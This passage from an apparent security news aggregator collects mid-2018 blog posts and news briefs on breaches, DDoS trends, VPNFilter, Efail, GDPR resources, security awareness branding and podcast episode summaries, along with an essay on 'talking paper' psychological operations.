Once they restarted I was able to speak to them from my microphone. In those days it was mostly burps and jokes, mischievous stuff, because it was fun to surprise users and listen to their reactions.

A few years later, as I was burrowing around in the dusty archives of the University of London (a room sadly which no longer exists because it was replaced by computer labs, but Duke University has a huge collection), I found vivid color leaflets that had been dropped by the RAF into occupied Ethiopia during WWII.

There in my hand was the actual leaflet credited with psychological operations “101”, and so a color copy soon became a page in my graduate degree thesis. In my mind these two experiences were never far apart.

For years afterwards when I would receive a greeting card with a tiny speaker and silly voice or song, of course I would take it apart and look for ways to re-purpose or modify its message. Eventually I had a drawer full of these tiny “talking paper” devices, ready to deploy, and sometimes they would end up in a friend’s book or bag as a surprise.

One of my favorite “talking” devices had a tiny plastic box that upon sensing light would yodel “YAHOOOOOO!” I tended to leave it near my bed so I could be awakened by yodeling, to set the tone of the new day. Of course when anyone else walked into the room and turned on the light their eyes would grow wide and I’d hear the invariable “WTF WAS THAT?”

Fast forward to today and I’m pleased to hear that “talking paper” has become a real security market and getting thinner, lighter and more durable. In areas of the world where Facebook doesn’t reach, military researchers still believe psychological manipulation requires deploying their own small remote platforms. Thus talking paper is as much a thing as it was in the 1940s or before and we’re seeing cool mergers of physical and digital formats, which I tried to suggest in my presentation slides from recent years:

While some tell us the market shift from printed leaflets to devices that speak is a matter of literacy, we all can see clearly in this DefenseOne story how sounds can be worth a thousand words.

Over time, the operation had the desired effect, culminating in the defection of Michael Omono, Kony’s radio telephone operator and a key intelligence source. Army Col. Bethany C. Aragon described the operation from the perspective of Omono.

“You are working for a leader who is clearly unhinged and not inspired by the original motivations that people join the Lord’s Resistance Army for. [Omono] is susceptible. Then, as he’s walking through the jungle, he hears [a recording of] his mother’s voice and her message begging him to come home. He sees leaflets with his daughter’s picture begging him to come home, from his uncle that raised him and was a father to him.”

Is anyone else wondering if Omono had been a typewriter operator instead of radio telephone whether the US Army could have convinced him via print alone?

Much of the story about the “new” talking paper technology is speculative about the market, like allowing recipients to be targeted by biometrics. Of course if you want a message to spread widely and quickly via sound (as he’s walking through the jungle), using biometric authenticators to prevent it from spreading at all makes basically no sense.

On the other hand (pun not intended) if a written page will speak only when a targeted person touches it, that sounds like a great way to evolve the envelope/letter boundary concepts. On the paper is the address of the recipient, which everyone and anyone can see, much like how an email address or phone number sits exposed on encrypted messaging. Only when the recipient touches it or looks at it, and their biometrics are verified, does it let out the secret “YAHOOOO!”

The Safety of Your Data On Social Media

Trend Micro recently asked a simple question on Twitter, “Are you worried about the safety of your data when using social media?”

Are you worried about the safety of your data when using social media?

More than 33,000 responses later and the answer is a toss up. The discussions in response to our tweet didn’t provide a clear answer either. This is despite months of high profile Facebook scandals and years of massive data breach headlines.

So what’s going on?

The Question

Posing a poll question is tricky. The question needs to be approachable enough to generate a lot of answers. It also needs to be a simple multiple choice, with only a few words per answer.

This will almost always result in a straightforward poll.

Not so this time. The answers are almost evenly divided across the three possible responses. Digging deeper, one of the challenges is how respondents chose to define the “safety” of their data.

As a security professional, I use one definition, but in my experience most people have their own idea when it comes to the “safety” of their data.

For some, it’s being in control of who can access that data. For others, safety is whether or not the data will be available when they want to access it. Others still think about whether or not they can get their data back out of the network once it has been shared.

The formal name for these concepts in information security is the CIA triad—I know, I know, I didn’t name it—confidentiality, integrity, and availability.

Whether you know it or not, for any definition of “safe,” you need all these of these attributes. Let’s look at each in turn.

Confidentiality

If everything you posted on Facebook was public, how often would you share?

Confidentiality is the most important attribute for the safety of your data on social networks. Not having control of who can access your data makes social networks significantly less valuable.

How you control the confidentiality of your data depends on the network.

On Facebook, you can change each post to be visible by only you, your friends, or the public. Other finer grain options for each post exist as well if you know how to find them. Similarly “Groups” allow you to share with a different audience.

On LinkedIn, you get similar options as Facebook. Twitter is much simpler. Your tweets are either public, protected (you approved who can see them), or you send a 1:1 direct message.

WhatsApp allows for 1:1 messaging or groups. Instagram defaults to public sharing but also allows direct messages.

Each of these systems help you control who can see your data. They allow you to control the confidentiality of your data.

The more control you have and know how to use, the safer you will feel about your data.

Integrity

Integrity is less of an issue with the major social networks. It’s understandable that once you’ve posted something, you expect the same information to be shown when appropriate.

But integrity issues do pop up in unexpected ways.

This happens most commonly when you post a video or photo and the network attempts to help you by automatically applying a filter, adjusting the levels, or possibly making edits on your behalf.

When your data changes without your permission or awareness, it could lead to unintended consequences.

Availability

Availability comes into play in two primary ways. It’s rare for social networks to have downtime or errors. This means that your data is almost always available when you want to view or share it.

The larger question of whether you can get your data back in its original format is much trickier. It’s a rare case that the social networks will let you export your complete information. It usually runs counter to their business model.

However, some networks do offer the ability to export said data from your account. This helps increase its availability to you.

Where Should You Focus?

The poll lacks context, which is the most likely reason why we saw the answers split almost evenly among the three choices.

While the availability and integrity of your data is important, in the context of your social media usage confidentialityshould be top of mind.

Most social networks provide a set of privacy controls that allow you to control who on the network can see your data.

Due to the nature of social media, these controls can change regularly. You should make a habit of checking the available options every so often to ensure that your data is safe.

Care About How You Share

Social media can be a fantastic way to engage with various communities, stay in touch with family & friends, and to expand your perspective. Unfortunately, there are down sides as well.

We’ve posted before about fake news, the privacy impact of networks selling data, and other issues related to social media usage.

Despite these challenges, there is still more upsides than down. The key to being a responsible social media user is to understand the control you have over your data.

Regardless of how you define “safe,” it’s important to be aware of the network you’re sharing on, how to use the control settings on that network, and have a clear understanding of what information you’re comfortable sharing.

What social media networks do you use most often? Do you feel you understand their privacy settings? Let us know down below or on social media (we’re @TrendMicro on most networks).

The post The Safety of Your Data On Social Media appeared first on .

Q1 2018 DDoS Trends Report: 58 Percent of Attacks Employed Multiple Attack Types

Verisign just released its Q1 2018 DDoS Trends Report, which represents a unique view into the attack trends unfolding online, through observations and insights derived from distributed denial of service (DDoS) attack mitigations enacted on behalf of Verisign DDoS Protection Services, and security research conducted by Verisign Security Services.

Download your free copy of the Q1 2018 DDoS Trends Report

Verisign observed that 58 percent of DDoS attacks that were mitigated in Q1 2018 employed multiple attack types. There was a 53 percent increase in the number of attacks, as well as a 47 percent increase in the attack peak sizes, when compared to Q4 2017; however, the attack peak sizes have decreased by 21 percent, year over year.

The largest volumetric and highest intensity DDoS attack observed by Verisign in Q1 2018 was a multi-vector attack that peaked at approximately 70 Gigabits per second (Gbps) and 7.4 Million packets per second (Mpps). The attack consisted of a wide range of attack vectors including TCP SYN and TCP RST floods, DNS and SNMP amplification attacks, Internet Control Message Protocol (ICMP) floods, and invalid packets.

Key DDoS Trends and Observations:

  • Fifty percent of DDoS attacks were User Datagram Protocol (UDP) floods.
  • TCP-based attacks were the second most common attack vector, making up 26 percent of attack types in the quarter.

  • Fifty-eight percent of DDoS attacks mitigated by Verisign in Q1 2018 employed multiple attack types.

  • The Financial industry, representing 57 percent of mitigation activity, was the most frequently targeted industry for Q1 2018. The IT/Cloud/SaaS industry experienced the second highest number of DDoS attacks, representing 26 percent of mitigation activity, followed by the Telecom industry, representing 17 percent of mitigation activity.

Selecting the Right DDoS Mitigation Strategy for Your Organization

As DDoS attacks remain a viable and unpredictable threat, how does your company determine the best mitigation strategy (or strategies) for protecting your online assets? What are your downtime tolerances? Whatever your organization’s downtime tolerance, staff readiness, and technical expertise, selecting a DDoS solution that accommodates a variety of mitigation strategies is paramount to getting the protection— and value—you deserve.

Read the report to learn more about DDoS mitigation strategies.

For more DDoS Trends in Q1 2018, download the full report, and be sure to check back in a few months when we release our Q2 2018 DDoS Trends Report.

The post Q1 2018 DDoS Trends Report: 58 Percent of Attacks Employed Multiple Attack Types appeared first on Verisign Blog.

SN 669: Cellular Location Privacy

This week we examine some new side-channel worries and vulnerabilities, did Mandiant "hack back" on China?, more trouble with browsers, the big Google Firebase mess, sharing a bit of my dead system resurrection, and a look at the recent Supreme Court decision addressing cellular location privacy.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

Keep it tight at the back: why the World Cup reminds us to give defenders credit

The World Cup’s in full flow and we don’t have to look hard to find parallels with security. We’ve seen flashy attackers pitted against dogged defenders. The sport has even managed to bring technology into the mix at Russia 2018 courtesy of the video-assisted referee (VAR).

In football, attackers are the ones you see on the highlights packages. A moment of skill – or luck – is a lot easier to capture on camera. It’s the same in security. Think of the praise heaped upon pen testers and external hackers when they score wins against vulnerable organisations.

Last line of defence

We think defenders don’t get the credit they deserve – in football or in security. The business of organising a defence is less glamorous and doesn’t easily lend itself to highlights reels. It takes hours of practice on the training ground to work on coordinating at the back, to limit the openings for attackers to strike. But as any football fan knows, a good defence’s contribution is at least as valuable to an organisation’s goals as the players at the other end of the pitch. And in truth, the teams that do well in previous World Cups have had a strong defensive lynchpin and a reliable keeper. (Think Cannavaro and Buffon in Italy’s 2006 winning team, or the Puyol-Casillas combination for Spain four years later.)

Global risks

Football is a global game, and this summer’s tournament reminds us that attacks can come from anywhere in the world. An unfortunate Moroccan defender’s stray header into his own net gifted a last-minute victory for Iran (while giving Spain and Portugal something to worry about in the process). It shows that an opponent just needs to be lucky once, but defences need to be on guard all the time.

Spreading the word

The World Cup is also a great opportunity to spread the security message among staff in an organisation. Crunch matches are happening during working hours, with the risk that distracted workers might be less vigilant to threats. Recent history has shown that large-scale sporting occasions bring scammers out of the woodwork in huge numbers. With the risk that people might be distracted with all the football, now’s a good time to strike with a reminder about phishing risks.

Let’s not forget about the risk of data breaches. The England World Cup camp unwittingly provided some fodder for data protection and security awareness campaigns last week. It was embarrassment all round after a photographer snapped what appeared to be the team lineup for the Panama match. To make matters worse, the accidental photo went public despite some impressive defences. The London Independent reported that “England’s training base is surrounded by three-metre screens to stop opponents spying on training and reporters are asked to leave after 15 minutes of open sessions”.

The lesson here is that security professionals need to cover all angles. What happens on the pitch – or in the public eye – is just one aspect of what an organisation does. With so many angles to cover, security professionals, like their footballing counterparts, need to keep their eye on the ball.

 

The post Keep it tight at the back: why the World Cup reminds us to give defenders credit appeared first on BH Consulting.

SN 668: Lazy FPU State Restore

This week we examine a rather "mega" patch Tuesday, a nifty hack of Win10's Cortana, Microsoft's official "when do we patch" guidelines, the continuing tweaking of web browser behavior for our sanity, a widespread Windows 10 rootkit, the resurgence of the Satori IoT botnet, clipboard monitoring malware, a forthcoming change in Chrome's extensions policy, hacking apparent download counts on the Android store, some miscellany, an update on the status of Spectre & Meltdown... and yes, yet another brand new speculative execution vulnerability our OSes will be needing to patch against.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

Olympic hackers may be attacking chemical warfare prevention labs

The team behind the 2018 Winter Olympics hack is still active, according to security researchers -- in fact, it's switching to more serious targets. Kaspersky has discovered that the group, nicknamed Olympic Destroyer, has been launching email phishing attacks against biochemical warfare prevention labs in Europe and Ukraine as well as financial organizations in Russia. The methodology is extremely familiar, including the same rogue macros embedded in decoy documents as well as extensive efforts to avoid typical detection methods.

Via: Wired

Source: Securelist

Fraudster caught using OPM hack data from 2015

Way back in 2015, the US Office of Personnel Management (OPM) was electronically burgled, with hackers making off with 21.5 million records. That data included social security numbers, fingerprints, usernames, passwords and data from interviews conducted for background checks. Now, a woman from Maryland has admitted to using data from that breach to secure fraudulent loans through a credit union.

Via: Reuters

Source: Department of Justice

How branding gives your security awareness messages extra strength

Many security professionals probably give little thought to branding; they prefer to leave that fluffy stuff to the marketing team. But when it comes to security awareness, branding can add a touch of goodness to your efforts. (And if you want to know what this has to do with creamy pints of the black stuff, read on.)

Leave aside your feelings about the term ‘branding’. For our purposes, it just means coming up with a name and a design, and then applying that same look and feel consistently and repeatedly across all your security initiatives – whether that’s phishing training, ransomware alerts, password hints and tips, or policy documents. You can also apply the brand regardless of whether the message appears in an email newsletter, posted on the office noticeboard, or on key rings. It’s a way to identify a link between messages, so your audience knows they come from the same source.

Why are consistency and repetition important? Research tells us that repetition plays a huge part in embedding learning and persuading an audience (thanks science!). The psychologist Robert Zajonc developed the concept of the ‘mere-exposure effect’. This means that repeating a message makes people familiar with it, and, over time, they become positively disposed towards it. Experts believe people need exposure to a message from six to 20 times for it to become effective.

Reuse and recycle

The good news is, you don’t have to be an advertising guru to develop a simple, effective brand for your security awareness programme. For a start, you can use material you’ve already got. Even if your business is relatively small, it will probably have a logo with a chosen colour scheme and font. Use them!

Larger organisations may even have more formal brand guidelines that you can use when developing your own materials. Now’s not the time to reinvent the wheel. Reusing or refreshing existing material (and corporate colours) helps to keep your costs down. It also reinforces your security brand because you’re subliminally linking your efforts to the company’s goals.

Designed to engage people

Design is where you can let your imagination run riot. If you don’t fancy your artistic abilities, take the opportunity to involve others in the company. You could tap into people’s creativity by offering an incentive to design the logo. In some of my previous roles, I created a competition with a €50 voucher as a prize for the winning design. It was a really effective way to start engaging people even before the awareness programme began. And engagement is, ultimately, what this is all about: capturing interest and attention. Always remember you’re trying to reach a very broad audience. The IT team should be on board anyway. You’re aiming for everyone in the organisation from the receptionist to the CEO.

Another word on design. Obviously, you may instinctively think of an image or icon that relates to security. (Full disclosure: personally, I’m not a fan of padlocks. Aside from being clichéd by now, a padlock has negative connotations. If you’re going to the trouble of branding security awareness efforts, it should promote a positive message about security.)

The medium is the message

And speaking of positive messages, a tagline can help to reinforce the behaviour and culture that you want to encourage. In several organisations, I’ve reused the phrase ‘be vigilant, be safe, be secure’. I included it on any emails I sent, and on all other printed and online materials relating to security awareness.

I put a lot of thought into the words, even down to the order they appear in. It’s got a certain internal rhythm to it, which makes it easier to recall. It’s framed as a positive message, rather than ‘don’t do this behaviour’. The words tell the reader what I wanted them to do: to remember to watch out for bad stuff, and to take care to protect themselves. Only at the end do I introduce the notion of security, which is something that arguably matters to the company more than motivating the end user. (The subject of motivation is worth a blog by itself, and I’ll come back to this subject in a future post.)

The beauty about security awareness is that it needs relatively little investment to deliver a potentially large return. You can keep your costs low by using materials already in the public domain or within your own company. Why not reach out to your marketing team and see if they can help? There’s no shortage of websites and blogs (ahem) with useful free security tips. For example, ENISA’s website has free-for-use awareness material including video clips, posters, illustrations and screen savers. If your efforts are more focused on privacy, try the UK ICO’s Think Privacy website, which shares best practice on awareness-raising programmes.

Security is good for you

Branding’s power can reach far beyond the product it’s trying to sell. Think of Guinness and how hordes of tourists depart from Dublin with clothes promoting a product many of them don’t even like! Now that’s the power of marketing. Why not harness some of that good stuff to give your security awareness extra strength?

 

The post How branding gives your security awareness messages extra strength appeared first on BH Consulting.

Cortana can be used to hack Windows 10 PCs

Cortana might be super helpful at keeping track of your shopping lists, but it turns out it's not so great at keeping your PC secure. Researchers from McAfee have discovered that by activating Cortana on a locked Windows 10 machine, you can trick it into opening up a contextual menu which can then be used for code execution. This could deploy malicious software, or even reset a Windows account password.

Via: The Verge

Source: McAfee

Major UK electrical retailer Dixons Carphone confirms it was hacked

One of Europe's largest electrical retailers has been the subject of a cyber attack that's compromised more than 5.9 million card records. Dixons Carphone, the owner of Currys PC World and Dixons Travel stores, says that most of these cards have chip and pin protection and noted that the data accessed doesn't include PIN numbers, card verification values (CVV) or any authentication data "enabling cardholder identification or a purchase to be made." However, some 105,000 cards were from non-EU countries and do not have the chip and pin feature.

Source: Dixons Carphone [pdf]

SN 667: Zippity Do… or Don’t

This week we update again on VPNFilter, look at another new emerging threat, check in on Drupalgeddon2, examine a very troubling remote Android vulnerability under active wormable exploitation, take stock of Cisco's multiple firmware backdoors, look at a new cryptomining strategy, the evolution of Russian state-sponsored cybercrime, a genealogy service that lost its user database, ongoing Russian censorship, another Adobe FLASH mess, and a check-in on how Marcus Hutchins is doing. Then we look at yet another huge mess resulting from insecure interpreters.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

UK privacy watchdog slaps Yahoo with another fine over 2014 hack

Yahoo still isn't done facing the consequences for its handling of a massive 2014 data breach. The UK's Information Commissioner's Office has slapped Yahoo UK Services Ltd with a £250,000 (about $334,300) fine under the country's Data Protection Act. The ICO determined that Yahoo didn't take "appropriate" steps to protect the data of 515,121 UK users against hacks, including meeting protection standards and monitoring the credentials of staff with access to the information.

Source: ICO

Security newsround: June 2018

We round up reporting and research from across the web about the latest security news and developments. This month: help at hand for GDPR laggards, try and efail, biometrics blues, and calls for a router reboot as VPNFilter strikes.

Good data protection resources (see what we did there?)

Despite a very well flagged two-year countdown towards GDPR, the eleventh-hour scramble suggests many organisations were still unprepared. And let’s not forget that May 25 wasn’t a deadline but the start of an ongoing compliance process. Fortunately, there are some excellent resources to help, and we’ve rounded them up here.

This blog from Ireland’s deputy data protection commissioner debunks the widely – and wrongly – held theory of a bedding-in period before enforcement. The post also clarifies how organisations can mitigate the potential consequences of non-compliance with GDPR. Meanwhile the Irish Data Protection Bill passed a vote in the Dail in time for the regulation. You can read the bill in full, if that’s your thing, by clicking here.

In the UK, the Information Commissioner’s Office has produced in-depth guidance on consent for processing information. Specifically, when to apply consent and when to look for alternatives. (Plug: our COO Valerie Lyons wrote a fine blog on the very same subject here.) Together with the National Cyber Security Centre, the ICO also developed guidance to describe a set of technical security outcomes that are considered to represent appropriate measures under the GDPR.

The European Data Protection Board (EDPB), formerly known as the Article 29 Working Party, was quickly into action after 25 May. It published guidelines (PDF) on certification mechanisms under the regulation. This establishes the rules by which certification can take place, as proof of compliance with GDPR.

Finally, for an interesting US perspective on the regulation, here’s AlienVault CISO John McLeod. “Every company should prepare for “Right to be Forgotten” requests, which could present operational and compliance issues,” he said.

Do the hack-a

World Rugby suffered a data breach which saw attackers obtain personal details for thousands of subscribers. The data included the first name, email address and encrypted passwords of thousands of users, including players, coaches and parents worldwide. The Sunday Telegraph broke the story, with an interesting take on the news. The breach may have been a random incident but it’s also possible it was a targeted attack. Potential culprits might be one of the groups that previously leaked information from sporting bodies like WADA and the IAAF. Rugby’s governing body discovered the incident in early May, and took down the affected website to conduct more examinations. World Rugby is based in Dublin, and as a result it informed the Data Protection Commissioner about the breach. How would you handle a breach on that scale? Read our 10 steps to better post-breach incident response.

Efail: an email encryption problem or a vulnerability disclosure problem?

A group of researchers in Germany recently published details of critical flaws in PGP/GPG and S/MIME email encryption. They warned that the vulnerabilities could decrypt previously encrypted emails, including sensitive messages sent in the past. Conforming to the security industry’s love of a catchy name (see also: Heartbleed, Shellshock), the researchers dubbed the flaw Efail.

It was the cue for urgent warnings from EFF.org among others, to stop using email encryption tools. As the researchers put it: “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” The full technical research paper is here, while there’s a website with a Q&A here.

As the story moved on, it emerged that the problem lay more with how some email clients rendered messages. Motherboard’s snarky but well-informed take quoted Johns Hopkins University cryptography professor Matthew Green. He described the exploit as “an extremely cool attack and kind of a masterpiece in exploiting bad crypto, combined with a whole lot of sloppiness on the part of mail client developers.” ProtonMail, the world’s largest secure email service, was scathing about the news. After performing a deep analysis, it said its own client was not vulnerable, nor was the PGP protocol broken.

So what are the big lessons from this story? Distraction is a risk in security. Some security professionals may have rushed to react to Efail even if they didn’t need to. Curtis Franklin’s summary for Dark Reading observed that many enterprise IT teams have either moved away from PGP and S/MIME, or never used them. Noting the criticism of how the researchers published the vulnerabilities, Brian Honan wrote that ENISA, the European Union Agency for Network and Information Security, published excellent good practice for vulnerability disclosure.

Biometrics blues as police recognition tech loses face

There was bad news for fans of dystopian sci-fi as police facial recognition systems for nabbing bad guys proved unreliable. Big Brother Watch claimed the Metropolitan Police’s automated facial recognition technology misidentified innocent people as wanted criminals more than nine times out of 10. The civil liberties group Big Brother Watch presented a report to the UK parliament about the technology’s shortcomings. Among its findings was the high false positive rate. Police forces have supported facial biometrics as a tool to help them combat crime. Privacy advocates described the technology’s use as “dangerously authoritarian”. As noted on our blog, this isn’t the first time a UK organisation has tried to introduce biometrics.

Router reboot alert

Malware called VPNFilter has infected 500,000 routers worldwide, and the net seems to be widening. Cisco Talos Intelligence researchers first revealed the malware, which hijacked devices in more than 54 countries but primarily in Ukraine. “The VPNFilter malware is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations,” the researchers said. VPNFilter can snoop on traffic, steal website credentials, monitor Modbus SCADA protocols, and has the capacity to damage or brick infected devices.

Sophos has a useful plain English summary of VPNFilter and what it can do. The malware affected products from a wide range of manufacturers, including Linksys, Netgear, Mikrotik, Q-Nap and TP-Link. In a later update, Talos said some products from Asus, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE were also at risk. As the malware’s payload became apparent, the FBI advised router owners to reboot their devices. This story shows that it’s always worth checking your organisation’s current risk with a security assessment.

 

The post Security newsround: June 2018 appeared first on BH Consulting.

“You have all these silver bullets but not every threat is a werewolf”

Attendees at FutureScope got an insight into how cybersecurity threats have evolved from a technical concern to a business risk. Last week’s business networking conference in Dublin promised perspectives on emerging technologies – including how security affects our increasingly connected world.

BH Consulting founder Brian Honan spoke as part of a panel discussion with Damon Rands, CEO of Wolfberry CS. MC Karlin Lillington, technology columnist with the Irish Times, started by asking: “Are we overly worried or underprepared? Hyped into panic or not taking this seriously enough?”

Brian Honan said: “I think we’re living in an era where we’re reaping the seeds sown over the last few decades.” That partly stems from governments not grasping issues like protecting critical infrastructure, or businesses rapidly releasing products without considering security.

Hype vs hygiene: figuring out security priorities

Hype from security product makers has also played a part, Brian added. “It’s a perfect storm. Any time there’s a new vulnerability announced, it comes with its own website and its own PR campaign. We saw that with Shellshock and Heartbleed, yet in reality, none of our clients were attacked.” Referring to security vendors’ tendency to oversell their products’ capabilities, he said: “You have all these silver bullets, but not every security threat is a werewolf.”

It’s far more common to see organisations with poor security hygiene where they don’t update software patches regularly, or they don’t protect systems properly, Brian said. “For large organisations and most businesses, the risks you face are the standard threats. They include users clicking on links, poor passwords and unpatched systems. When we run security exercises against our clients, the first thing we target is not the IT infrastructure, it’s the people,” said Brian.

Damon Rands agreed. “90% of our work is reconfiguring what [systems] you’ve got already,” he said. At the same time, there are very real threats businesses need to protect against, he added.

Understanding cybersecurity threat types

Those threats vary by the type of businesses, said Brian. “If you’re a small business, the risk is of automated attacks like ransomware or computer viruses; kids and criminals looking for insecure systems. That’s at the base level. As you go up to large organisations with large amounts of data or intellectual property, you become a more targeted threat.”

Addressing the audience, Brian said most businesses shouldn’t think they face the same cybersecurity threats as nation states. “Not everybody in this room is a target for the NSA or GRU,” he said.

Damon Rands said Cyber Essentials is a framework of security controls that can help businesses to check for common risks. However, he pointed out that Cyber Essentials only focuses on technical security controls, not user behaviour and awareness. Growing numbers of businesses have adopted it recently and Rands said: “I believe that’s due to GDPR.”

Another evolution in cybersecurity predates GDPR, Brian added. When he founded BH Consulting in 2004, most of the people he spoke to back in 2004 were in technical roles. “Nowadays, we are being brought in by boards, audit committees and the C-suite who see security as a business risk,” he said.

This prompted Karlin Lillington to ask about how to pitch a technical security message to such a different audience. Brian said: “You have to treat it as another business risk. Very few businesses in the world would be efficient if they didn’t have their IT.”

The post “You have all these silver bullets but not every threat is a werewolf” appeared first on BH Consulting.

Ticketfly is finally back online after hack

Ticketfly's site is back online after a hack last week which forced the company to take the site down while it investigated the incident. The iOS app, along with the Promoter and Fanbase functions, are still down, as Ticketfly prioritized "bringing up the most critical parts of the platform first." It's also rolling out promoter and venue websites that the platform powers.

Source: Ticketfly

Atlanta ransomware attack may cost another $9.5 million to fix

The effects of the "SamSam" ransomware attack against Atlanta's government were much worse than it seemed at first glance. To start, city Information Management head Daphney Rackley revealed at a meeting that more than a third of Atlanta's 424 necessary programs were knocked offline or partly disabled, and close to 30 percent of those affected apps were "mission critical" -- that is, vital elements like the court system and police. The government initially reckoned that essential programs were safe.

Source: Reuters

‘WannaCry hero’ faces more federal malware charges

Marcus Hutchins, the cybersecurity researcher credited with helping stop last year's WannaCry virus, is facing four new charges related to malware he allegedly created to steal financial information. Now, the FBI says Hutchins lied about creating the malware called Kronos, and that he conspired with others to promote it online, including via YouTube.

Source: US District Court Eastern District of Wisconsin

SN 666: Certificate Transparency

This week we discuss yesterday's further good privacy news from Apple, the continuation of VPNFilter, an extremely clever web browser cross-site information leakage side-channel attack, Microsoft Research's fork of OpenVPN for security in a post-quantum world, Microsoft drops the ball on a 0-day remote code execution vulnerability in JScript, Valve finally patches a longstanding and very potent RCE vulnerability, Redis caching servers continue to be in serious trouble, a previously patched IE 0-day continues to find victims, Google's latest Chrome browser has removed support for HTTP public key pinning (HPKP), and... what is "Certificate Transparency" and why do we need it?

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

MyHeritage admits 92 million user email addresses were leaked

MyHeritage is the latest company to suffer a security breach after a researcher found a file containing email addresses and hashed passwords for more than 92 million users. The researcher alerted MyHeritage to the breach Monday. The data includes account details for users who signed up to the genealogy and DNA testing service by October 26th last year.

Via: Motherboard

Source: MyHeritage

Ticketfly hacker stole more than 26 million email and home addresses

A hacker has leaked personal information for more than 26 million Ticketfly users after last week's data breach. That's according to Troy Hunt, the founder of Have I Been Pwned, which lets you check whether your email address has been included in various data breaches.

Source: Motherboard

Ticketfly says user data was compromised in recent hack

After it temporarily shut down its site Thursday, Ticketfly has confirmed it was hacked, and that the attackers compromised some client (i.e. venue) and customer data. The extent of the hack, and the types of data that the attackers accessed, is not yet known. Ticketfly is investigating the issue and has brought in third-party forensic experts to help it get back online. The company will give ticket buyers more information here as it becomes available.

Source: Ticketfly

Ticketfly temporarily shuts down to investigate ‘cyber incident’

It's not a great time to be a concertgoer. Ticketfly has temporarily shut down after a "cyber incident" (read: hack) compromised its systems. An intruder defaced the company's website around midnight on May 31st with claims that they had compromised the "backstage" database where festivals, promoters and venues manage their events. Billboard sources didn't believe this included credit card data, but the attacker had posted files supposedly linking to info for Ticketfly "members."

Source: Billboard

Attacker involved in 2014 Yahoo hack gets five years in prison

The hacker-for-hire involved in the 2014 Yahoo security breach that affected 500 million users has been sentenced to five years in prison. Karim Baratov aka Karim Taloverov aka Karim Akehmet Tokbergenov said he didn't know he was working for Russian spies, since he didn't research his customers. His name first came up when two Russian nationals were charged with orchestrating the Yahoo breach -- according to the DOJ, those nationals were the ones who gave him data from the breach, which he then used to hack into the email accounts of American and Russian journalists, government officials and employees of financial services and private businesses, as well as other persons of interest.

Source: DOJ, ABC News

The building blocks to a career in cybersecurity

Forging a career in cybersecurity is like building a house. Starting with a solid foundation makes it easier to build the layers on top. Now that I am a client-facing consultant performing ISO 27001 gap analysis and internal audits, it’s clear to me how my previous role in application support gave me a grounding in key elements of security .

Having this technical background under my belt prior to moving in to cybersecurity was a big plus for me . It made me more confident in knowing what exactly I should look for when conducting an audit for a client. It also reinforced the importance of seeing evidence of an action being done.

Technical background

My time with Hewlett-Packard Enterprise (HPE) taught me the fundamentals of computers and the basics in computer security to progress in to my current consultant role. Having been a support manager for a major application that more than 8,000 engineers used, I quickly learned the importance of segregating environments. I helped to secure and improve development, testing, staging and production environments. I worked on solving issues such as capacity management,  server access, allocating appropriate resources and stability issues.

In fact, many of my duties directly corresponded to a specific section of the ISO 27001 security standard. After investigating environment stability, I needed to order more resources to balance development and staging environments with the testing environment servers in the VMs (A.12.1 of ISO 27001, which covers capacity management). Later, as the environments’ workload increased, I spec’d  out and ordered more servers (A.14, covering system acquisition, development and maintenance).

All told, I gained experience in a broad range of areas, such as A.14.2 (security in development and support processes), A.13.1 (network security management), A.13.2 (information transfer), A.12.4 (logging and monitoring), and A.9.2 (user access management).

Applying experience to cybersecurity

Many people think of cybersecurity and think it’s all “IT” and “computers” – which was true for my desk-based job. However, as a consultant, it is abundantly clear we look for much more. It starts as soon as I walk through the client’s office door. Is someone manning the reception area when I arrive, or does someone escort me and tell me where to go? (Sometimes I ask to use a bathroom before meeting a client. Many times, someone told me where to go and I happily sauntered through the offices unescorted.)

Now, I’m looking out for weaknesses in physical security: a fire door left open, when the fire extinguishers were last serviced, an unlocked device with nobody standing at it, the all-too-familiar Post-it note with a username and password stuck to the side of the monitor or desk.

I spent my time before BH Consulting trying to get the prerequisites I would need to work in cybersecurity. Once I started working in the field, I realised how much of my knowledge I could easily apply. The nature of the work means constant change and the opportunity to keep building on that knowledge.

The post The building blocks to a career in cybersecurity appeared first on BH Consulting.

SN 665: VPNFilter

This week we discuss Oracle's planned end of serialization, Ghostery's GDPR faux paus, the emergence of a clever new banking Trojan, Amazon Echo and the case of the Fuzzy Match, more welcome movement from Mozilla, yet another steganographic hideout, an actual real-world appearance of HTTP Error 418 (I'm a Teapot!), the hype over Z-Wave's Z-Shave, and a deep dive into the half a million strong VPNFilter botnet.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

SN 664: SpectreNG Revealed

